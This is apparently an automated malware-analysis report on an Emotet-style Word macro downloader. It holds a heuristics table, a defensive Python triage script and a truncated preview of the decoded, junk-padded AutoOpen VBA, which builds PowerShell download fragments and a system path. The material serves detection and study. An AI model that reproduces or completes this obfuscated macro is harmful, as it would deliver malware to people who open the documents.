Verdict: MALICIOUS (risk score 250)

Malware Insights

MITRE ATT&CK techniques:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document carrying a VBA project whose AutoOpen subroutine runs as soon as the document is opened with macros enabled (T1204.002), the standard execution path for a spearphishing attachment (T1566.001). The recovered source is padded with junk statements (integer Xor/Or arithmetic and meaningless Like comparisons) between assignments of short string literals, several of which read as PowerShell fragments ($sao='m, f='et-', '/wp-cont', bject Sys); the macro also reads Environ("systemroot") (the name itself is built as "system" & "root") and appends "\system" to it, the start of a path assembled at run time. The Shell() and CreateObject() calls flagged below are consistent with that command being assembled and executed to fetch a second-stage payload, but the preview is truncated before the call site, so the final command cannot be recovered from this report alone. The ClamAV detection Doc.Malware.Emodldr-6769670-0 corroborates the verdict independently of the heuristics.
Heuristics (8)

| Finding | Severity | Rule ID | Detail |
|---|---|---|---|
| ClamAV: Doc.Malware.Emodldr-6769670-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Emodldr-6769670-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. Analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.iec.ch, found in document text (OLE body). |

Note that the canned description of the legacy WordBasic rule ("no modern VBA project was recovered") conflicts with the macros.bas artifact listed below, which is a recovered VBA project; treat that finding as redundant with OLE_VBA_AUTOOPEN rather than as separate evidence. The http://www.iec.ch URL comes from the document body, not from the macro, and is not shown by this report to be the payload location.
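As an added worked example (not part of this report and not oletools code), the following Python script shows how an analyst can triage a dump like macros.bas offline: it applies the four OLE_VBA_* indicator rules above as regexes, discards the integer Xor/Or and Like filler that pads this macro, harvests the string literals in the order they are assigned, and statically resolves the simple concatenations and Environ() lookups without executing any VBA. The input is constructed from assignments visible in the preview below; the CreateObject()/Shell tail at the end is a hypothetical stand-in, because the preview is truncated before the real call site, and the severities are the ones the report shows.

```python
import re

# Constructed input: the assignments are copied from the macro preview on this
# page (junk included); the CreateObject()/Shell tail is a HYPOTHETICAL
# stand-in, because the page's preview is truncated before the real call site.
SAMPLE_VBA = r'''Attribute VB_Name = "NewMacros"
Sub AutoOpen()
bdhuayks = "u" Like "o"
xgxleyrd = -25358
aeytja49 = 58819
eqrkczh = (xgxleyrd Xor aeytja49)
hjjcpcjgi = "$iumed"
rpoaeg = Array("Fil';$sao='m")(0)
psruu = "system"
ltbrsze = "root"
rdasre = psruu & ltbrsze
gvsverpli = "';$ayoef"
eicgbopmh = Environ(rdasre)
vfarsoi24 = Array("ais='/wp-cont';")(0)
glaiwba = "\system"
eicgbopmh = eicgbopmh + glaiwba
ikqqakt64 = "'ent).Do';$imzooge='bject Sys'"
' hypothetical tail: not on the page, the preview stops earlier
Set qwerty = CreateObject("WScript.Shell")
Shell eicgbopmh, 0
End Sub
'''

# Indicator rules modelled on the report's OLE_VBA_* heuristics, same severities.
INDICATORS = [
    ("OLE_VBA_AUTOOPEN", "high", re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open)\b", re.I | re.M)),
    ("OLE_VBA_SHELL", "critical", re.compile(   # statement-position Shell, not "WScript.Shell" in a string
        r"^\s*(?:Call\s+)?(?:\w+\s*=\s*)?Shell\b", re.I | re.M)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
]

STR_LIT = r'"((?:[^"]|"")*)"'                  # VBA string literal, "" escapes a quote
RE_ASSIGN = re.compile(r"^(\w+)\s*=\s*(.+)$")
RE_JUNK = re.compile(                           # filler: x = "a" Like "b", x = 123, x = (a Xor b)
    r"\bLike\b|^\w+\s*=\s*(?:-?\d+|\(\s*\w+\s+(?:Xor|Or|And)\s+\w+\s*\))$", re.I)
RE_LITERAL = re.compile(r"^" + STR_LIT + r"$")
RE_ARRAY0 = re.compile(r"^Array\(" + STR_LIT + r"\)\(0\)$")
RE_ENVIRON = re.compile(r"^Environ\(\s*(.+?)\s*\)$", re.I)
RE_TOKEN = re.compile(r'"(?:[^"]|"")*"|[&+]|\w+')


def _operand(tok, vars_):
    """Resolve one operand: a quoted literal or an already-known string variable."""
    if len(tok) >= 2 and tok.startswith('"') and tok.endswith('"'):
        return tok[1:-1].replace('""', '"')
    return vars_.get(tok.lower())


def _eval(rhs, vars_, state):
    """Evaluate the string-building subset this macro uses; None for anything else."""
    m = RE_LITERAL.match(rhs) or RE_ARRAY0.match(rhs)
    if m:
        lit = m.group(1).replace('""', '"')
        state["fragments"].append(lit)          # harvested in assignment order
        return lit
    m = RE_ENVIRON.match(rhs)
    if m:
        name = _operand(m.group(1), vars_)
        if name is None:
            return None
        sym = "%" + name.upper() + "%"          # symbolic: never read os.environ here
        state["env_lookups"].append(sym)
        return sym
    toks = RE_TOKEN.findall(rhs)                # a & b, a + "lit", ... concatenations
    if len(toks) >= 3 and len(toks) % 2 == 1 and all(t in ("&", "+") for t in toks[1::2]):
        parts = [_operand(t, vars_) for t in toks[0::2]]
        if all(p is not None for p in parts):
            return "".join(parts)
    return None


def triage_vba(src):
    """Indicator hits plus the fragments, resolved variables and Environ() lookups
    recovered from an olevba-style VBA dump."""
    hits = [(ident, sev) for ident, sev, rx in INDICATORS if rx.search(src)]
    vars_, state = {}, {"fragments": [], "env_lookups": []}
    for raw in src.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or RE_JUNK.search(line):
            continue
        m = RE_ASSIGN.match(line)
        if not m:
            continue
        val = _eval(m.group(2).strip(), vars_, state)
        if val is not None:
            vars_[m.group(1).lower()] = val
    return {"indicators": hits, "vars": vars_, **state}


if __name__ == "__main__":
    r = triage_vba(SAMPLE_VBA)
    for ident, sev in r["indicators"]:
        print(f"{sev:8s} {ident}")
    print("Environ() lookups :", r["env_lookups"])
    print("resolved path var :", r["vars"].get("eicgbopmh"))
    print("string fragments  :", r["fragments"])
```

Fragments come out in assignment order, not in the order the macro later concatenates them, so the list is raw material for the analyst rather than the final command; recovering that order needs the concatenation expression, which sits in the truncated part of the preview. Resolving Environ() to a symbolic %SYSTEMROOT% instead of reading the analysis host's environment keeps the output host-independent, and the Like filter is deliberately crude (a legitimate string containing the word Like would be dropped with the junk).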
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45751 bytes | 44577d6f88a3fde9027101d9e2143b3b8fbf55803e553d70a73e9767f8dc0dfd |
Script preview: first 1,000 lines of the extracted macros.bas (the listing is truncated below).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
bdhuayks = "u" Like "o"
xgxleyrd = -25358
aeytja49 = 58819
eqrkczh = (xgxleyrd Xor aeytja49)
meundngb = 5958
auvtepi = -6107
euonr = (meundngb Xor auvtepi)
hjjcpcjgi = "$iumed"
ycgcdfvm = "qzd" Like "vrtvwgbsu7"
unuakko = -33099
ooefu6 = 45149
jiojz55 = (unuakko Xor ooefu6)
lbzeyl = -21603
thvhynxn = 42082
yufdave = (lbzeyl Or thvhynxn)
blvey10 = 17048
ymvln80 = -23503
tdktti4 = (blvey10 Or ymvln80)
beey = -7180
rsildlxps = 31238
nvupme = (beey Xor rsildlxps)
rpoaeg = Array("Fil';$sao='m")(0)
lfbbkbudx70 = "oksuuqzbwo" Like "gbxatxah"
oayz = "twerbxebsu" Like "o"
bhnepgw = -41734
hqyjrj = -49869
ewfpefhdg = (bhnepgw Xor hqyjrj)
mdzllu9 = 16793
oioa03 = 65210
aoup = (mdzllu9 Xor oioa03)
yxhae31 = 15582
uluub = 18477
yqwae = (yxhae31 Xor uluub)
psruu = "system"
ltbrsze = "root"
jgeehst = "rwcgsrnqd" Like "rmwqmnonyyag"
rdasre = psruu & ltbrsze
hesciy0 = 43780
qfoiicj5 = -6882
eshuiphy = (hesciy0 Or qfoiicj5)
ixrqyqhe = -21643
wcioisdc = -16710
yvdfeu8 = (ixrqyqhe Or wcioisdc)
djsiga = "wpwd" Like "fmetduodb"
brooubq = "dadaaxktfg" Like "md"
orxevla = "jlplgx" Like "uqdixd"
gvsverpli = "';$ayoef"
yabai = 47257
iedb10 = 63270
jjpugo = (yabai Or iedb10)
cyhqodpu26 = -10702
oqwybx = -5151
hojzu = (cyhqodpu26 Xor oqwybx)
maaew = "egl" Like "b"
oriz = -9567
jiarr = 13252
krviavxdj = (oriz Xor jiarr)
iaaoi = 12727
aaichuu = 30047
mrwhjnp = (iaaoi Xor aaichuu)
effemhi = Array("holryv07=")(0)
oiytsa9 = "qykielppnhjqa" Like "ui"
nkaudxgdi = "shaefots" Like "ielupmyby2"
mozgvm = "enwanmitmu" Like "iirdqrijtv"
hjhxvht = "y" Like "oasgyjoaeve"
oooa = "f='et-';$yd"
nmru = -28560
yyfuemn = -52217
wjtnijfb = (nmru Or yyfuemn)
cskaqv = "gaieo43" Like "e"
jqqqucgp = "ooklxhjacnsza2" Like "dontvv"
vfprto = -22282
omyeamk = 3745
uyash = (vfprto Or omyeamk)
zpleca = "yferlipk" Like "stoiesc"
vtjuu = "esf" Like "qfzomyll9"
rnlodwi3 = Array("eakk='en")(0)
geooy = 60102
udhpqrjk = 22975
reoyi = (geooy Or udhpqrjk)
kebgxff90 = "tmeszoia" Like "stqmei"
uzio = -54789
lfrueih = 25314
oacxokdhh59 = (uzio Or lfrueih)
gayy = -24234
owvy0 = -47545
aeiqwvc = (gayy Xor owvy0)
oedhfidd = "wz" Like "crhoqwkecllnln"
eicgbopmh = Environ(rdasre)
uwfou = -14226
uoyuo = -22486
diyor24 = (uwfou Or uoyuo)
vfarsoi24 = Array("ais='/wp-cont';")(0)
fouyybl3 = 31317
tzhvncu = 24249
yicdf = (fouyybl3 Xor tzhvncu)
tstmwiua = "nxfupaaa" Like "wrytatnwr"
yojcdhp = "a" Like "k"
yljmsc = "dxh" Like "ygmwoaqwu"
tuolxyj = "$woeeavn='e"
eulhyt = -46793
wscgeiu = -18653
dkzkjo = (eulhyt Or wscgeiu)
ojao = -29222
otuoob = -65925
zfvjlodg = (ojao Or otuoob)
sapmvmq = 2567
bwbnmo = 30931
xyocyy = (sapmvmq Xor bwbnmo)
irqusmj24 = "hynqhrnuakr" Like "o"
xzyqmak = -65518
yoriyh2 = 31420
tgssgiexh = (xzyqmak Or yoriyh2)
iesie = -58754
oxkqjb = -56038
ylfli62 = (iesie Or oxkqjb)
glaiwba = "\system"
mzbervu = "u" Like "dmmgcx"
ouxxhpi3 = "jvbm" Like "msqykaomh0"
ixhhe = "bfurxyanv5" Like "zplojucbo1"
iyui = 37113
hprqbpr = -22013
ootqbj1 = (iyui Or hprqbpr)
auaoult = 30989
ceei33 = 9156
idfttni = (auaoult Xor ceei33)
eicgbopmh = eicgbopmh + glaiwba
heuez = "tcswvhqsgqs" Like "xwyag"
krwnkxeq = "yuwnnwifucq" Like "yazsg"
asod = -6790
iuuj5 = 8844
imnvvae = (asod Or iuuj5)
aecax = "v07+$tp"
uwzny = "j" Like "kgoghztlvygrco0"
dwmoxxctq = 55428
ktpyom = -51836
lhjau39 = (dwmoxxctq Or ktpyom)
zjbyduo30 = "tmspwytxg" Like "aiuefcympvpn"
bneueiv = "yauvo" Like "epaj"
lvxkox94 = "auaofpymar" Like "ljoeizpbt"
ikqqakt64 = "'ent).Do';$imzooge='bject Sys'"
nesbs = "euaju" Like "iiswmfpiqwf"
fusuyc = "eaeey" Like "wyqeaoo93"
yvxtkx = "hl" Like "itlplkdnmabbt4"
winaoa = "o" Like "h
... (truncated)